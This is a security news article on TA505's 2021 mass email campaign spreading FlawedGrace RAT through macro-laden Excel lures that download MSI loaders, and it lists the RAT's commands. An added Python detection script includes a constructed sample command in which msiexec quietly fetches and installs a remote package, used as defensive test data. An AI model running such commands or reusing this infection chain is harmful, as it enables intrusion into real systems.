TA505 Hackers Group Spreading FlawedGrace RAT Via Mass Email Campaigns

A massive malicious email campaign attributed to the TA505 group has recently been discovered targeting users in Germany and Austria; through it the threat actors are distributing the FlawedGrace RAT.

The current campaign has been linked to the TA505 hacking group, whose members have used the Dridex banking Trojan and the following tools in past attacks:-

  • FlawedAmmyy
  • FlawedGrace
  • Neutrino botnet
  • Locky ransomware

Evolving Campaigns

The attacks began with a series of small email waves delivering only a few thousand messages at each stage, before the number of messages spiked to hundreds of thousands in late September.

The picture changed in late September and early October 2021: in this time frame TA505 began sending far higher email volumes, in the tens to hundreds of thousands, to more industries.

Commonalities to Historic TA505 Activity

Comparing the current campaign with earlier TA505 campaigns reveals many similarities, including:-

  • Emails
  • Landing pages
  • Excel graphic lures
  • Domain naming conventions
  • Code reuse

Once a user opens the malicious Microsoft Excel attachment, the threat actors trick them into enabling macros; the macros then download an obfuscated MSI file that installs the next-stage downloaders.

Once these steps are complete, the downloaders install an updated version of the FlawedGrace remote access Trojan. At this stage, the loader scaffolds are written in uncommon scripting languages:-

  • Rebol
  • KiXtart
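As an added illustration of the infection chain just described (not code from the original article), the following Python script flags process-creation events in which an Office application spawns msiexec.exe, or msiexec.exe is handed a remote package URL. The events, paths and URL are constructed samples, and the event shape only loosely imitates a Sysmon process-creation record.

```python
"""Flag process-creation events matching an Excel-macro -> MSI-download chain.
The events below are constructed samples, not real telemetry."""
import re
from typing import Dict, List

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOADER_IMAGES = {"msiexec.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed events in a loosely Sysmon-like shape (image, parent image, command line).
EVENTS: List[Dict[str, str]] = [
    {"pid": "412", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmd": "explorer.exe"},
    {"pid": "4321", "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": '"EXCEL.EXE" "C:\\Users\\u\\Downloads\\invoice.xls"'},
    {"pid": "4500", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": "msiexec.exe /q /i http://example.invalid/update.msi"},  # constructed URL
    {"pid": "4600", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\services.exe", "cmd": "msiexec.exe /V"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like the macro -> MSI chain (empty if benign)."""
    reasons = []
    image, parent = basename(event["image"]), basename(event["parent"])
    if parent in OFFICE_APPS and image in LOADER_IMAGES:
        reasons.append("office-app spawned msiexec")
    if image in LOADER_IMAGES and REMOTE_URL.search(event["cmd"]):
        reasons.append("msiexec given a remote package URL")
    return reasons


def find_suspicious(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map pid -> reasons for every event that triggers at least one rule."""
    return {e["pid"]: classify(e) for e in events if classify(e)}


if __name__ == "__main__":
    for pid, reasons in find_suspicious(EVENTS).items():
        print(pid, "; ".join(reasons))
```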

Commands supported by FlawedGrace RAT

FlawedGrace was first discovered in November 2017. It is a full-featured RAT written in C++ and specifically designed to hinder reverse engineering and analysis.

The Trojan receives and executes the following commands from its C&C server over a custom binary protocol on TCP port 443:-

  • target_remove
  • target_update
  • target_reboot
  • target_module_load
  • target_module_load_external
  • target_module_unload
  • target_download
  • target_upload
  • target_rdp
  • target_passwords
  • target_servers
  • target_script
  • destroy_os
  • desktop_stat

TA505 is a financially motivated hacking group well known for conducting malicious email campaigns on an unprecedented scale.

The group also changes its TTPs frequently, which is why it is considered one of the leaders of the cybercrime world.

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.